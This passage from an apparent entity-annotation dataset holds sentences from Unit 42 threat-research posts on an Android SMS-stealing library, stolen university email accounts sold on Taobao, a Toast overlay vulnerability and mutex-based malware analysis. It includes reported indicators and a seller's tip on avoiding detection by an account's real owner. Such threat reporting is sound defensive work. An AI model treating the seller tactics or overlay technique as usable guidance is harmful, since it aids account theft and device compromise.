“zdtpay” and is a component of Taomike’s IAP system. Because Android apps are required to list the permissions they need in their manifest file, we can see that this library requires both SMS and network related permissions.","entities":[{"id":46467,"label":"SOFTWARE","start_offset":62,"end_offset":82},{"id":46468,"label":"SOFTWARE","start_offset":93,"end_offset":100},{"id":46466,"label":"identity","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":960,"text":"The library also registers a receiver named com.zdtpay.Rf2b for both the SMS_RECEIVED and BOOT_COMPLETED actions with highest priority of 2147483647.","entities":[],"relations":[],"Comments":[]} {"id":961,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":962,"text":"Registered receiver for SMS_RECEIVED The registered receiver Rf2b reads SMS messages whenever they arrive.","entities":[],"relations":[],"Comments":[]} {"id":963,"text":"The message body and sender phone number are collected as shown in Figure 2. Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":964,"text":"SMS body and sender number read ","entities":[],"relations":[],"Comments":[]} {"id":965,"text":"If the device has just booted, it will start the service MySd2e, which then registers a receiver for Rf2b as shown in Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":966,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":967,"text":"MySd2e Service registers receiver for Rf2b ","entities":[],"relations":[],"Comments":[]} {"id":968,"text":"SMS information collected by the receiver is saved in a hashmap with “other” as the key and sent to a method that uploads the message to 112.126.69.51 as shown in Figure 4.","entities":[{"id":3036,"label":"IPV4","start_offset":137,"end_offset":150}],"relations":[],"Comments":[]} {"id":969,"text":" Figure 4. Information uploaded to IP Address used by api.taomike.com ","entities":[{"id":44914,"label":"DOMAIN","start_offset":54,"end_offset":69}],"relations":[],"Comments":[]} {"id":970,"text":"All SMS messages sent to the phone are uploaded, not just those that are relevant to Taomike’s platform.","entities":[{"id":46470,"label":"identity","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":971,"text":"Figure 5 shows a packet capture of a test message upload.","entities":[],"relations":[],"Comments":[]} {"id":972,"text":"The message content is “hey test msg” as circled with dashed red box.","entities":[],"relations":[],"Comments":[]} {"id":973,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":974,"text":"SMS uploaded via HTTP in pcap The Taomike library makes contact with the following URLs, but only the “2c.php” path is used to capture SMS messages.","entities":[{"id":3051,"label":"attack-pattern","start_offset":128,"end_offset":148},{"id":46472,"label":"FILEPATH","start_offset":104,"end_offset":110},{"id":46471,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":975,"text":"The rest appear to be used for other parts of the IAP functionality in the library.","entities":[],"relations":[],"Comments":[]} {"id":976,"text":"Risks and Mitigation ","entities":[],"relations":[],"Comments":[]} {"id":977,"text":"We have captured over 18,000 samples that contain the SMS stealing library since August 2015, meaning the number of affected users is considerable.","entities":[{"id":46473,"label":"TIME","start_offset":81,"end_offset":92},{"id":46474,"label":"attack-pattern","start_offset":54,"end_offset":66}],"relations":[],"Comments":[]} {"id":978,"text":"We expect the number of affected apps and users to increase as more developers incorporate the newer version of Taomike library.","entities":[{"id":46475,"label":"identity","start_offset":112,"end_offset":119}],"relations":[],"Comments":[]} {"id":979,"text":" The infected apps are not limited to a single developer or third party store as many developers appear use the Taomike library.","entities":[{"id":46476,"label":"identity","start_offset":112,"end_offset":119}],"relations":[],"Comments":[]} {"id":980,"text":"Some of the infected apps purport to contain or display adult content.","entities":[],"relations":[],"Comments":[]} {"id":981,"text":" We do not know how Taomike is using the stolen SMS messages, but no library should capture all messages and send them to a system outside the phone.","entities":[{"id":46477,"label":"identity","start_offset":20,"end_offset":27}],"relations":[],"Comments":[]} {"id":982,"text":"In version 4.4 of Android (KitKat) Google began preventing apps from capturing SMS messages unless they were defined as the “default” SMS app.","entities":[{"id":46479,"label":"identity","start_offset":35,"end_offset":41},{"id":46478,"label":"SOFTWARE","start_offset":18,"end_offset":34}],"relations":[],"Comments":[]} {"id":983,"text":" Users outside of China and those that only download apps from the official Google Play store are not at risk from this threat. ","entities":[{"id":46480,"label":"SOFTWARE","start_offset":76,"end_offset":87},{"id":46481,"label":"location","start_offset":18,"end_offset":23}],"relations":[],"Comments":[]} {"id":984,"text":"To protect Palo Alto Networks customers from the Taomike SMS stealer, we’ve made the following protections available:","entities":[{"id":44915,"label":"identity","start_offset":11,"end_offset":29},{"id":44916,"label":"malware","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} {"id":985,"text":" Conclusion Even popular third party monetization platforms are not always trustworthy.","entities":[],"relations":[],"Comments":[]} {"id":986,"text":"When developers incorporate the libraries into their apps they need to carefully test them and monitor for any abnormal activities.","entities":[],"relations":[],"Comments":[]} {"id":987,"text":"Identifying monetization and advertising platforms that behave poorly and abuse their users is something that our industry must to do ensure the safety of all mobile devices and their users.","entities":[],"relations":[],"Comments":[]} {"id":988,"text":" Acknowledgement We greatly appreciate the help from Rongbo Shao from Palo Alto Networks in working on the Threat Prevention signature.","entities":[{"id":46482,"label":"identity","start_offset":71,"end_offset":89},{"id":46483,"label":"identity","start_offset":54,"end_offset":65}],"relations":[],"Comments":[]} {"id":989,"text":"We would also like to thank Ryan Olson, Benjamin Small, Richar Wartell, and Chris Clark from Palo Alto networks in publishing the discovery.","entities":[{"id":46484,"label":"identity","start_offset":28,"end_offset":38},{"id":46485,"label":"identity","start_offset":40,"end_offset":54},{"id":46486,"label":"identity","start_offset":56,"end_offset":70},{"id":46487,"label":"identity","start_offset":76,"end_offset":87},{"id":46488,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} {"id":990,"text":" Related Sample Hash Values Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":991,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":992,"text":"Recently, we found email accounts from top universities across the world being sold on Taobao, the largest consumer-to-consumer (C2C) e-commerce platform in China.","entities":[{"id":46489,"label":"SOFTWARE","start_offset":87,"end_offset":93},{"id":46490,"label":"location","start_offset":157,"end_offset":162}],"relations":[{"id":194,"from_id":46489,"to_id":46490,"type":"located-at"}],"Comments":[]} {"id":993,"text":"Advertised uses for these accounts included registering for special accounts under software developer programs, receiving student discounts or coupons from retailers, and obtaining access to academic databases.","entities":[],"relations":[],"Comments":[]} {"id":994,"text":" This post describes the scope, associated risks, and implications of this activity.","entities":[],"relations":[],"Comments":[]} {"id":995,"text":" Our investigation began with a Chinese language search for \"edu mailbox\" in Taobao, which returned 99 results related to stolen university email accounts.","entities":[{"id":46491,"label":"SOFTWARE","start_offset":77,"end_offset":83}],"relations":[],"Comments":[]} {"id":996,"text":"The most expensive account was listed at ¥2400 RMB ($390.80 USD), while the cheapest was only ¥0.98 RMB ($0.16 USD). Figure 1: Results for Chinese language \"edu mailbox\" search on Taobao.","entities":[{"id":46492,"label":"SOFTWARE","start_offset":181,"end_offset":187}],"relations":[],"Comments":[]} {"id":997,"text":" These accounts, which include an education (EDU) top-level domain email address with valid password, represent 42 of the world’s top universities, across 10 countries: ","entities":[],"relations":[],"Comments":[]} {"id":999,"text":"The descriptions for these items proposed three main uses for buyers: ","entities":[],"relations":[],"Comments":[]} {"id":1000,"text":"1. Registering for special accounts under software developer programs:","entities":[],"relations":[],"Comments":[]} {"id":1001,"text":"For example, the most popular account type, which has been bought at least 569 times, was advertised as a Microsoft’s student Windows Phone 7 and 8 developer account.","entities":[{"id":46504,"label":"identity","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} {"id":1002,"text":"By using this kind of account, a user can perform a developer unlock on their Windows Phone devices without incurring a fee.","entities":[],"relations":[],"Comments":[]} {"id":1003,"text":"Most reviews of this package were favorable, with comments like \"very good to use\" or \"with seller’s help I can unlock my phone now.\"","entities":[],"relations":[],"Comments":[]} {"id":1004,"text":" Figure 2: The most popular account type has sold at least 569 times.","entities":[],"relations":[],"Comments":[]} {"id":1005,"text":"2. Receiving student discounts or coupons from retailers:","entities":[],"relations":[],"Comments":[]} {"id":1006,"text":"Some accounts advertised candidacy towards registration for student discount at retailers such as Amazon, BestBuy, Apple, and Dell.","entities":[{"id":46508,"label":"identity","start_offset":126,"end_offset":130},{"id":46507,"label":"identity","start_offset":115,"end_offset":120},{"id":46505,"label":"identity","start_offset":98,"end_offset":104},{"id":46506,"label":"identity","start_offset":106,"end_offset":113}],"relations":[],"Comments":[]} {"id":1007,"text":"For example, the standard annual fee for Amazon Prime is $99 USD; however, with the student discount, a buyer could enjoy it for free the first six months and then renew at half price for subsequent years.","entities":[{"id":46509,"label":"identity","start_offset":41,"end_offset":53}],"relations":[],"Comments":[]} {"id":1008,"text":"Figure 3: The seller showed how to register for student discount accounts.","entities":[],"relations":[],"Comments":[]} {"id":1009,"text":"3. Obtaining access to academic databases:","entities":[],"relations":[],"Comments":[]} {"id":1010,"text":"Accounts for big universities (e.g., MIT, Stanford, etc.) are mainly used to access respective library services and resources, \"including research help, study spaces, print and electronic books\/journals and more.\"","entities":[{"id":46511,"label":"identity","start_offset":42,"end_offset":50},{"id":46510,"label":"identity","start_offset":37,"end_offset":40}],"relations":[],"Comments":[]} {"id":1011,"text":"Figure 4:","entities":[],"relations":[],"Comments":[]} {"id":1012,"text":"A seller advertises how an MIT account can be used to access online library resources.","entities":[{"id":46512,"label":"identity","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} {"id":1013,"text":" We talked with some sellers through AliWangWang, an instant message (IM) system developed by Taobao for online trading.","entities":[{"id":46513,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":46514,"label":"identity","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} {"id":1014,"text":"A well-stocked seller told us that every account he sold belonged to an active student at the respective university.","entities":[],"relations":[],"Comments":[]} {"id":1015,"text":"He claimed that once the account was sold, only the one buyer and the legitimate user would have access.","entities":[],"relations":[],"Comments":[]} {"id":1016,"text":"He recommended not changing the account password to avoid detection by the legitimate user.","entities":[],"relations":[],"Comments":[]} {"id":1017,"text":"Another seller offered to provide real identity information for a stolen account so the buyer could change the corresponding password and security questions.","entities":[],"relations":[],"Comments":[]} {"id":1018,"text":"This type of account access was the most expensive and least flexible in terms of customization (i.e., username, institution, etc.).","entities":[],"relations":[],"Comments":[]} {"id":1019,"text":"Additionally, it should be noted that there is value beyond the EDU account itself for password and security question information, in the event they are shared across other online accounts for the legitimate user.","entities":[],"relations":[],"Comments":[]} {"id":1020,"text":" Other sellers were also able to offer customizable email accounts from a specific domain\/institution.","entities":[],"relations":[],"Comments":[]} {"id":1021,"text":"Figure 5: A seller advertising a customizable “xxx.edu” email account.","entities":[],"relations":[],"Comments":[]} {"id":1022,"text":"In the above advertisement, the seller describes the ability to choose an account under a subdomain (academia, student, me, email, or contact) of the requested domain.","entities":[],"relations":[],"Comments":[]} {"id":1023,"text":"The price for this custom account was only ¥27 RMB ($4.40 USD); for an extra ¥13 RMB ($2.12 USD), the buyer can request a custom username at any subdomain for the given institution.","entities":[],"relations":[],"Comments":[]} {"id":1024,"text":" To further assess this threat, we purchased a customized, new account from a seller on Taobao.","entities":[{"id":46515,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} {"id":1025,"text":"Four hours later, we received confirmation that the custom email address \"claud@student.cnri.edu\" was active.","entities":[{"id":3215,"label":"TIME","start_offset":0,"end_offset":16},{"id":46516,"label":"EMAIL","start_offset":74,"end_offset":96}],"relations":[],"Comments":[]} {"id":1026,"text":"Navigating to CNRI’s webmail page, we were then able to successfully access and send an email from that account.","entities":[{"id":46517,"label":"identity","start_offset":14,"end_offset":18}],"relations":[],"Comments":[]} {"id":1027,"text":" Figure 6: Sending an email through a newly bought customized EDU account.","entities":[],"relations":[],"Comments":[]} {"id":1028,"text":" Another noteworthy trend we observed was that some sellers provided email addresses with customizable usernames at \"californiacolleges.edu\".","entities":[{"id":46518,"label":"DOMAIN","start_offset":117,"end_offset":139}],"relations":[],"Comments":[]} {"id":1029,"text":"In fact, anyone can do the same by visiting the California Colleges Create an Account page.","entities":[{"id":44918,"label":"identity","start_offset":48,"end_offset":67}],"relations":[],"Comments":[]} {"id":1030,"text":"Accounts made through this site \"can be used to apply [for] related memberships of Amazon Prime, Microsoft Developer, Adobe and Apple by some secret ways,\" one seller said.","entities":[{"id":46519,"label":"identity","start_offset":83,"end_offset":95},{"id":46522,"label":"identity","start_offset":128,"end_offset":133},{"id":46520,"label":"identity","start_offset":97,"end_offset":106},{"id":46521,"label":"identity","start_offset":118,"end_offset":123}],"relations":[],"Comments":[]} {"id":1031,"text":" Figure 7: Using a newly created California Colleges account.","entities":[{"id":46523,"label":"identity","start_offset":33,"end_offset":52}],"relations":[],"Comments":[]} {"id":1032,"text":"As with most criminal enterprises, not all sellers on Taobao use their real identity, presenting a challenge in tracking down the individuals behind this activity.","entities":[{"id":46524,"label":"SOFTWARE","start_offset":54,"end_offset":60}],"relations":[],"Comments":[]} {"id":1033,"text":"In order to sell anything on Taobao, a seller must at least create a valid Alipay account (similar to PayPal) linked to a valid Chinese citizen ID number (similar to a U.S. Social Security number), and then associate it with a valid Chinese bank account under the same citizen ID.","entities":[{"id":46526,"label":"SOFTWARE","start_offset":75,"end_offset":81},{"id":46525,"label":"SOFTWARE","start_offset":29,"end_offset":35},{"id":46527,"label":"SOFTWARE","start_offset":102,"end_offset":108}],"relations":[],"Comments":[]} {"id":1034,"text":"However, identity theft is a global concern and the Chinese citizen ID is no exception, allowing for potential sellers to simply purchase a usable identity online.","entities":[{"id":46528,"label":"attack-pattern","start_offset":8,"end_offset":23}],"relations":[],"Comments":[]} {"id":1035,"text":" Based on our investigation, we believe that stolen accounts for these universities are actively selling on Taobao.","entities":[{"id":44920,"label":"SOFTWARE","start_offset":108,"end_offset":114},{"id":44921,"label":"attack-pattern","start_offset":45,"end_offset":60}],"relations":[{"id":195,"from_id":44921,"to_id":44920,"type":"related-to"}],"Comments":[]} {"id":1036,"text":"On August 27, we reported our findings to Taobao.","entities":[{"id":46529,"label":"TIME","start_offset":3,"end_offset":12},{"id":46530,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} {"id":1037,"text":"Their response was that they were addressing this issue and have already removed a number of these items, with the remainder requiring further investigation.","entities":[],"relations":[],"Comments":[]} {"id":1038,"text":"However, this malicious seller activity may also reveal a larger scale problem within university systems.","entities":[],"relations":[],"Comments":[]} {"id":1039,"text":"Through the types of accounts advertised on Taobao, an attacker can steal a student or staff account, assume their identity, and gain unauthorized access to standard university resources.","entities":[{"id":46531,"label":"SOFTWARE","start_offset":43,"end_offset":50}],"relations":[],"Comments":[]} {"id":1040,"text":"More sophisticated and nefarious uses include leveraging accounts in social engineering\/phishing attacks or exploiting access to high-value university systems (e.g., personnel, financial, research) to steal information.","entities":[{"id":46533,"label":"attack-pattern","start_offset":88,"end_offset":104},{"id":46534,"label":"attack-pattern","start_offset":69,"end_offset":87},{"id":46535,"label":"attack-pattern","start_offset":108,"end_offset":125},{"id":46536,"label":"attack-pattern","start_offset":201,"end_offset":218}],"relations":[],"Comments":[]} {"id":1041,"text":"Fortunately, a number of the institutions impacted by this activity have already implemented two-factor authentication for high-value resources, reducing the risk of the latter.","entities":[],"relations":[],"Comments":[]} {"id":1042,"text":"Yet, we believe the residual risk and exposure call for further action.","entities":[],"relations":[],"Comments":[]} {"id":1043,"text":" The following are our suggestions for discovering and mitigating risks associated with this activity: Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1044,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1045,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1046,"text":"This post is also available in: 日本語 (Japanese) Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high- severity vulnerability affecting the Google Android platform.","entities":[{"id":46537,"label":"identity","start_offset":60,"end_offset":98},{"id":46538,"label":"SOFTWARE","start_offset":174,"end_offset":197}],"relations":[],"Comments":[]} {"id":1047,"text":"Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin.","entities":[{"id":44922,"label":"TIME","start_offset":60,"end_offset":74},{"id":44923,"label":"SOFTWARE","start_offset":75,"end_offset":83}],"relations":[],"Comments":[]} {"id":1048,"text":"This new vulnerability does NOT affect Android 8.0 Oreo, the latest version; but it does affect all prior versions of Android.","entities":[{"id":46539,"label":"SOFTWARE","start_offset":39,"end_offset":55},{"id":46540,"label":"SOFTWARE","start_offset":118,"end_offset":124}],"relations":[],"Comments":[]} {"id":1049,"text":"There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time.","entities":[{"id":46541,"label":"identity","start_offset":79,"end_offset":105}],"relations":[],"Comments":[]} {"id":1050,"text":"Since Android 8.0 is a relatively recent release, this means that nearly all Android users should take action today and apply updates that are available to address this vulnerability.","entities":[{"id":44924,"label":"SOFTWARE","start_offset":6,"end_offset":17},{"id":44925,"label":"SOFTWARE","start_offset":77,"end_offset":84}],"relations":[],"Comments":[]} {"id":1051,"text":" What our researchers have found is a vulnerability that can be used to more easily enable an “overlay attack,” a type of attack that is already known on the Android platform.","entities":[{"id":46543,"label":"SOFTWARE","start_offset":158,"end_offset":165}],"relations":[],"Comments":[]} {"id":1052,"text":"This type of attack is most likely to be used to get malicious software on the user’s Android device.","entities":[{"id":46544,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":1053,"text":"This type of attack can also be used to give malicious software total control over the device.","entities":[],"relations":[],"Comments":[]} {"id":1054,"text":"In a worst-case attack scenario, this vulnerability could be used to render the phone unusable (i.e., a “brick”) or to install any kind of malware including (but not limited to) ransomware or information stealers.","entities":[],"relations":[],"Comments":[]} {"id":1055,"text":"In simplest terms, this vulnerability could be used to take control of devices, lock devices and steal information after it is attacked.","entities":[{"id":46545,"label":"attack-pattern","start_offset":55,"end_offset":78},{"id":46547,"label":"attack-pattern","start_offset":80,"end_offset":92},{"id":46546,"label":"attack-pattern","start_offset":97,"end_offset":114}],"relations":[],"Comments":[]} {"id":1056,"text":"An “overlay attack” is an attack where an attacker’s app draws a window over (or “overlays”) other windows and apps running on the device.","entities":[{"id":44926,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} {"id":1057,"text":"When done successfully, this can enable an attacker to convince the user he or she is clicking one window when, in fact, he or she is actually clicking another window.","entities":[],"relations":[],"Comments":[]} {"id":1058,"text":"In Figure 1, you can see an example where an attacker is making it appear that the user is clicking to install a patch when in fact the user is clicking to grant the Porn Droid malware full administrator permissions on the device.","entities":[{"id":46548,"label":"malware","start_offset":166,"end_offset":176}],"relations":[],"Comments":[]} {"id":1059,"text":"Figure 1: Bogus patch installer overlying malware requesting administrative permissions ","entities":[],"relations":[],"Comments":[]} {"id":1060,"text":"You can see how this attack can be used convince users to unwittingly install malware on the device.","entities":[],"relations":[],"Comments":[]} {"id":1061,"text":"This can also be used to grant the malware full administrative privileges on the device.","entities":[],"relations":[],"Comments":[]} {"id":1062,"text":" An overlay attack can also be used to create a denial-of-service condition on the device by raising windows on the device that don’t go away.","entities":[{"id":44927,"label":"attack-pattern","start_offset":48,"end_offset":65}],"relations":[],"Comments":[]} {"id":1063,"text":"This is precisely the type of approach attackers use with ransomware attacks on mobile devices.","entities":[],"relations":[],"Comments":[]} {"id":1064,"text":" Of course, an overlay attack can be used to accomplish all three of these in a single attack: Overlay attacks aren’t new; they’ve been discussed before.","entities":[],"relations":[],"Comments":[]} {"id":1065,"text":"But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful: These are significant mitigating factors and so overlay attacks haven’t been reckoned a serious threat.","entities":[{"id":46549,"label":"identity","start_offset":51,"end_offset":55},{"id":44929,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":44930,"label":"attack-pattern","start_offset":148,"end_offset":163}],"relations":[],"Comments":[]} {"id":1066,"text":" However, our new Unit 42 research shows that there is a way to carry out overlay attacks where these mitigating factors don’t apply.","entities":[{"id":46550,"label":"identity","start_offset":18,"end_offset":25}],"relations":[],"Comments":[]} {"id":1067,"text":"If a malicious app were to utilize this new vulnerability, our researchers have found it could carry out an overlay attack simply by being installed on the device.","entities":[{"id":46551,"label":"attack-pattern","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} {"id":1068,"text":"In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks.","entities":[{"id":46552,"label":"SOFTWARE","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} {"id":1069,"text":"It’s important to note that apps from websites and app stores other than Google Play form a significant source of Android malware worldwide.","entities":[{"id":46553,"label":"SOFTWARE","start_offset":114,"end_offset":121},{"id":46554,"label":"SOFTWARE","start_offset":73,"end_offset":84}],"relations":[],"Comments":[]} {"id":1070,"text":" The particular vulnerability in question affects an Android feature known as “Toast.” “Toast” is a type of notification window that “pops” (like toast) on the screen.","entities":[{"id":46555,"label":"SOFTWARE","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} {"id":1071,"text":"“Toast” is typically used to display messages and notifications over other apps.","entities":[],"relations":[],"Comments":[]} {"id":1072,"text":" Unlike other window types in Android, Toast doesn’t require the same permissions, and so the mitigating factors that applied to previous overlay attacks don’t apply here.","entities":[{"id":46556,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":1073,"text":"Additionally, our researchers have outlined how it’s possible to create a Toast window that overlays the entire screen, so it’s possible to use Toast to create the functional equivalent of regular app windows.","entities":[],"relations":[],"Comments":[]} {"id":1074,"text":" In light of this latest research, the risk of overlay attacks takes on a greater significance.","entities":[],"relations":[],"Comments":[]} {"id":1075,"text":"Fortunately, the latest version of Android is immune from these attacks “out of the box.”","entities":[{"id":46557,"label":"SOFTWARE","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":1076,"text":"However, most people who run Android run versions that are vulnerable.","entities":[{"id":46559,"label":"SOFTWARE","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} {"id":1077,"text":"This means that it’s critical for all Android users on versions before 8.0 to get updates for their devices.","entities":[{"id":46560,"label":"SOFTWARE","start_offset":38,"end_offset":45}],"relations":[],"Comments":[]} {"id":1078,"text":"You can get information on patch and update availability from your mobile carrier or handset maker.","entities":[],"relations":[],"Comments":[]} {"id":1079,"text":" Of course, one of the best protections against malicious apps is to get your Android apps only from Google Play, as the Android Security Team aggressively screens against malicious apps and keeps them out of the store in the first place.","entities":[{"id":46562,"label":"SOFTWARE","start_offset":101,"end_offset":112},{"id":46561,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":46563,"label":"identity","start_offset":121,"end_offset":142}],"relations":[],"Comments":[]} {"id":1080,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":1081,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1082,"text":"Mutex analysis is an often overlooked and useful tool for malware author fingerprinting, family classification, and even discovery.","entities":[],"relations":[],"Comments":[]} {"id":1083,"text":"Far from the hypothesized \"huge amount of variability\" in mutex names, likely hypothesized due to the seemingly random appearance of them, practical mutex usage is embarrassingly consistent.","entities":[],"relations":[],"Comments":[]} {"id":1084,"text":"In fact, over 15% of all collected worms share a single mutex [2gvwnqjz].","entities":[],"relations":[],"Comments":[]} {"id":1085,"text":" This blog was sourced from the data generated by the WildFire Analytics cloud, which processes thousands of samples a day and provides insights into various characteristics and behaviors of malware worldwide.","entities":[{"id":46564,"label":"SOFTWARE","start_offset":54,"end_offset":78}],"relations":[],"Comments":[]} {"id":1086,"text":"But before we get into the details, here is a quick overview of mutexes and why they exist in the first place.","entities":[],"relations":[],"Comments":[]} {"id":1087,"text":" The mutex is the fundamental tool for managing shared resources between multiple threads (or processes).","entities":[],"relations":[],"Comments":[]} {"id":1088,"text":"If you think of the threads as a whole bunch of people in a meeting, all trying to talk at once, a mutex is the baton that gets passed from one person to the next so that there’s only one person talking at a time.","entities":[],"relations":[],"Comments":[]} {"id":1089,"text":"The important thing to understand is what the mutex is really protecting.","entities":[],"relations":[],"Comments":[]} {"id":1090,"text":"In the above example, the resource being protected isn’t the right to speak, as many might think, but rather the ability to listen.","entities":[],"relations":[],"Comments":[]} {"id":1091,"text":" Here’s a more technical example.","entities":[],"relations":[],"Comments":[]} {"id":1092,"text":"Lets say you want to update an Internet Explorer (IE) cookie file, adding a unique identifier for use later.","entities":[{"id":44932,"label":"SOFTWARE","start_offset":31,"end_offset":53}],"relations":[],"Comments":[]} {"id":1093,"text":"Naively, what you need to do is read the cookie file in, add your data to what you’ve read, and write the file back to disk.","entities":[],"relations":[],"Comments":[]} {"id":1094,"text":"But what if IE is running and also updating that file?","entities":[{"id":46565,"label":"SOFTWARE","start_offset":12,"end_offset":14}],"relations":[],"Comments":[]} {"id":1095,"text":"The worst case, for you, is that both you and IE read the file at the same time but you write your edits first.","entities":[{"id":46566,"label":"SOFTWARE","start_offset":46,"end_offset":48}],"relations":[],"Comments":[]} {"id":1096,"text":"This is because IE will completely destroy your edits when it writes its new version of the file over yours.","entities":[{"id":46567,"label":"SOFTWARE","start_offset":16,"end_offset":18}],"relations":[],"Comments":[]} {"id":1097,"text":" The solution to this problem is to use a mutex to protect the integrity of the cookie file.","entities":[],"relations":[],"Comments":[]} {"id":1098,"text":"A process that has the mutex knows that while it holds that mutex no other process will be accessing the cookie file.","entities":[],"relations":[],"Comments":[]} {"id":1099,"text":"It can then read, tweak, and write the file without fear of any clobbering by other processes.","entities":[],"relations":[],"Comments":[]} {"id":1100,"text":" Since each shared resource can only have a single mutex effectively protecting it, leveraging that mutex is indication that a program will be using said resource.","entities":[],"relations":[],"Comments":[]} {"id":1101,"text":"In the cookie file example above, just referencing the mutex protecting that file indicates, with extremely high probability, that functionality to change the file exists somewhere in the program.","entities":[],"relations":[],"Comments":[]} {"id":1102,"text":" Any given mutex, and protected functionality, can then be thought of as an independent library of sorts.","entities":[],"relations":[],"Comments":[]} {"id":1103,"text":"Note that while the technical implementation may not expose said functionality as a normal library, such exposure is not necessary for the types of analysis performed here.","entities":[],"relations":[],"Comments":[]} {"id":1104,"text":"That library’s usage can be analyzed in terms of who uses it.","entities":[],"relations":[],"Comments":[]} {"id":1105,"text":"Simply put: malware writers leverage malware specific libraries and groups of like actors will reuse these core libraries when able. The needle in a haystack problem forever plagues malware research: it’s extremely difficult to find reliable information with malware writers constantly working to undermine or eliminate that information.","entities":[],"relations":[],"Comments":[]} {"id":1106,"text":"But, in the case of mutex analysis, the useful information pretty well slapped us in the face.","entities":[],"relations":[],"Comments":[]} {"id":1107,"text":" As can be clearly seen, mutex 2gvwnqjz1 is strongly associated with malware.","entities":[],"relations":[],"Comments":[]} {"id":1108,"text":"In fact, we have only seen it in malware.","entities":[],"relations":[],"Comments":[]} {"id":1109,"text":" As is equally obvious, not all mutexes offer such dramatic insight.","entities":[],"relations":[],"Comments":[]} {"id":1110,"text":"There are many common mutexes shared across both benign software and malware.","entities":[],"relations":[],"Comments":[]} {"id":1111,"text":"What’s more, they don’t all share millions of uses across both sides of the fence.","entities":[],"relations":[],"Comments":[]} {"id":1112,"text":" In cases such as these the common approach is to use sets of the data, in this case sets of mutexes, to create fingerprints of each sample and then leverage those fingerprints to extract higher confidence classification decisions.","entities":[],"relations":[],"Comments":[]} {"id":1113,"text":"While this avenue of research is being pursued, it suffers from all the traditional challenges of big data research.","entities":[],"relations":[],"Comments":[]} {"id":1114,"text":"In other words, it’s slow going.","entities":[],"relations":[],"Comments":[]} {"id":1115,"text":" In parallel, and to inform better hypothesis for the fingerprint generation, research is being done to determine how far single mutex analysis can take us.","entities":[],"relations":[],"Comments":[]} {"id":1116,"text":"The research is ongoing but the initial results are extremely promising.","entities":[],"relations":[],"Comments":[]} {"id":1117,"text":" The number of times any single mutex is used drops rapidly from the millions of samples down to thousands and from there, even further.","entities":[],"relations":[],"Comments":[]} {"id":1118,"text":"Tens of thousands of the mutexes have been seen in only a single sample each.","entities":[],"relations":[],"Comments":[]} {"id":1119,"text":"This results in a few hundred thousand individual mutexes available for further analysis.","entities":[],"relations":[],"Comments":[]} {"id":1120,"text":" What quickly becomes apparent is that a large majority of the mutexes provide no obvious means to automatically classify them as necessarily indicative of good or bad behavior.","entities":[],"relations":[],"Comments":[]} {"id":1121,"text":"And, unfortunately, the ones, which are reasonably easy for a human to identify, are so for significantly different reasons.","entities":[],"relations":[],"Comments":[]} {"id":1122,"text":"For example, “autoproto_*” -- More than 20 mutexes share that preface, offering a natural fingerprint.","entities":[],"relations":[],"Comments":[]} {"id":1123,"text":" “global\\setup_028746_mutexitem” -- Associated solely with known malware digital signers.","entities":[],"relations":[],"Comments":[]} {"id":1124,"text":" “defined_setnocandy” -- After reading mutex names for a few hours this just sticks out like a sore thumb.","entities":[{"id":3460,"label":"TIME","start_offset":56,"end_offset":67}],"relations":[],"Comments":[]} {"id":1125,"text":" Only the first of the examples had the mutex associated with a vast majority of malware samples.","entities":[],"relations":[],"Comments":[]} {"id":1126,"text":"This implies that any fully automated association of a mutex to either benign or malware samples will itself require complex fingerprinting and confidence models.","entities":[],"relations":[],"Comments":[]} {"id":1127,"text":" Full automation is always the ideal but it isn’t always necessary.","entities":[],"relations":[],"Comments":[]} {"id":1128,"text":"With the appropriate tools it’s possible to enable a single researcher to continually review and categorize new mutexes.","entities":[],"relations":[],"Comments":[]} {"id":1129,"text":"The initial classifications to be used are “benign”, “malware”, or 